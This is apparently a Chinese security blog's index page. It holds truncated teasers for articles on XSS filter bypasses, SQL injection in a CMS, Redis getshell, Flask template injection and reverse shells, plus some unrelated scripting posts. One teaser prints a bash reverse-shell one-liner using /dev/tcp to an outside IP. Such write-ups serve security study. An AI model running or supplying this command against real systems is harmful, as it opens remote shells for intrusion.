首发于先知社区：https://xz.aliyun.com/t/2279 author:ADog 0x00 前言 这篇帖子主要真的针对的是某cms的一个处理xss漏洞的函数，函数不是很复杂，突破手段也有很多，这里讲下我对这个函数突破...

To：znn 0x01 背景 前段时间苏宁src五倍积分，想着无事刷一刷玩玩，碰到一个反射型XSS，如下图： 插入<img src=a>测试正常(此处截图遗失，漏洞已修补)，证明存在XSS，但是过滤了许多关...

author:davichi8282 0×00概述 近期在审计HDWiki 6.0最新版cms的时候发现由referer导致的sql注入问题。SQL注入我们知道是由于代码与数据没有严格区别限制分离而导致的问题，OWASP TOP 10常年把S...

0x00 前言 今天同学突然提到了redis，想到最近搞站确实有一段时间没有遇到redis getshell的场景了（主要是最近懒，搞得少），有些利用方式都忘的差不多，这里再对常见的redis getshell方式总结...

author:KBdancer 前言 博主从小就是一个喜欢把事情简单化的男人，但是现实总是在不经意间给你太多的惊喜，比如不停的搬家。 博主从大学毕业到现在前前后后凑足了10次搬家运动，终于在第10次搬家...

上次去参加BCTF，第一道AWD题目就是Flask的SSTI漏洞，当时由于不熟悉Flask框架，，所以一开始没意识到这是模板命令注入的漏洞，，直到抓到别人的流量才知道了payload，，回来之后好好学了下Flas...

author：waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...

由于换了Mac，因此原来windows下的mysql监控小软件不能再用，只能自己造个轮子，下午抽空写了个监控脚本，代码不是很复杂，供有需要的人阅读参考，也可以根据下面再做定制 环境（Python 2.7） ...

这个库主要是配合neo4j图数据库来使用的python第三方库，最近在做图数据库，自然而然就需要py2neo库来对图数据库里的数据做处理，此篇文章主要是对py2neo的使用做一个简单的说明，虽然网上有很...

0x00 前记 这里的漏洞分析只挑选了两个觉得有新意的点来说，整个cms肯定还是有很多漏洞，可以说是值得练手的一款cms，并且由于是根据某付费cms二次制作完成，因此市面上这类汽车网源码肯定也是...